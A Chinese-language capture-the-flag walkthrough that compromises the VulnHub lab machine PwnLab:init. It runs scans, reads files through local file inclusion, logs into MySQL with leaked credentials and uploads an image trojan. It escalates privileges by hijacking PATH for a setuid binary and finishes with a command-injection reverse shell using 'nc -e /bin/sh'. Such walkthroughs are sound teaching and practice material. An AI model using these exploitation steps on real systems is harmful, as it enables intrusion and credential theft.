PwnLab:init
下载地址:
https://download.vulnhub.com/pwnlab/pwnlab_init.ova实战操作
靶场IP地址:192.168.0.27。
扫描靶场端口信息
┌──(root💀kali)-[~/Desktop]
└─# nmap -sV -p1-65535 192.168.0.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 08:15 EST
Nmap scan report for 192.168.0.27
Host is up (0.0026s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
41133/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E5:CA:92 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds扫描80WEB端口服务。
┌──(root💀kali)-[~/Desktop]
└─# nikto -h http://192.168.0.27/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.27
+ Target Hostname: 192.168.0.27
+ Target Port: 80
+ Start Time: 2021-12-30 08:17:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2021-12-30 08:18:16 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested访问80端口WEB服务,点击upload功能提示需要登录。
尝试使用SQL注入是测试,发现不可以。
然后注意到像这种URL:http://192.168.0.27/?page=login,很大程度存在本地文件包含漏洞。nikto扫描到config.php文件,直接文件包含config.php。
http://192.168.0.27/?page=php://filter/convert.base64-encode/resource=configbase64解密
┌──(root💀kali)-[~/Desktop]
└─# echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?> MySQL连接上去,发现用户名密码(base64加密)。
┌──(root💀kali)-[~/Desktop]
└─# mysql -uroot -pH4u%QJ_H99 -h192.168.0.27 1 ⨯
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.001 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.001 sec)
MySQL [Users]> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.000 sec)解密用户密码。
┌──(root💀kali)-[~/Desktop]
└─# echo Sld6WHVCSkpOeQ== | base64 -d
JWzXuBJJNy
┌──(root💀kali)-[~/Desktop]
└─# echo U0lmZHNURW42SQ== | base64 -d
SIfdsTEn6I
┌──(root💀kali)-[~/Desktop]
└─# echo aVN2NVltMkdSbw== | base64 -d
iSv5Ym2GRo 上传反弹shell,提示只允许图片文件上传。
修改上传后缀,报错ERROR 001。
修改上传类型,报错ERROR 002。
修改上传类型以及添加图片头。
尝试本地文件包含图片木马,但是失败。
http://192.168.0.27/?page=php://filter/read=convert.base64-encode/resource=upload/450619c0f9b99fca3f46d28787bc55c5.gif
本地包含index.php文件。
可以发现index.php源码里面有个cookie的lang参数,存在文件包含漏洞。
┌──(root💀kali)-[~]
└─# echo PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html> lang参数文件包含到Linux密码文件。
本地文件包含图片木马,nc反弹。
使用bash终端,方便显示。
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwnlab:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)查看home目录发现之前MySQL的几个用户。
www-data@pwnlab:/$ ls
ls
bin dev home lib media opt root sbin sys usr vmlinuz
boot etc initrd.img lost+found mnt proc run srv tmp var
www-data@pwnlab:/$ cd /home
cd /home
www-data@pwnlab:/home$ ls
ls
john kane kent mike使用上面kane密码进行提权,找到msgmike一个二进制文件。
kent@pwnlab:~$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home/kent$ cd /home/kane
kane@pwnlab:~$ ls
msgmike
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped可以看到msgmike尝试查看mike目录msg.txt。
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ string msgmike
bash: string: command not found
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/mike/msg.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4猜测msgmike源代码
int main()
{
system("cat /home/mike/msg.txt");
} 查看环境变量,因为为该组设置了 SUID 位,正如您所看到的,Mike 在mike和kane组中。
kane@pwnlab:~$ cd /tmp
kane@pwnlab:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:/tmp$ echo '/bin/bash' >> cat
kane@pwnlab:/tmp$ chmod +x /tmp/cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ ~/msgmike
mike@pwnlab:/tmp$ whoami
mike查看mike目录msg2root文件。
猜测msg2root源代码
#include <iostream>
char msg[1024]; //Let's assume no BO takes place, alrighty?
char command[1024];
int main()
{
printf("Message for root: ");
scanf("%s", msg);
snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg);
system(command);
} 直接nc反弹,虽然可以root,但是最后查不到flag.txt
hello; $(nc -e /bin/sh 192.168.0.8 11111)最后更新于
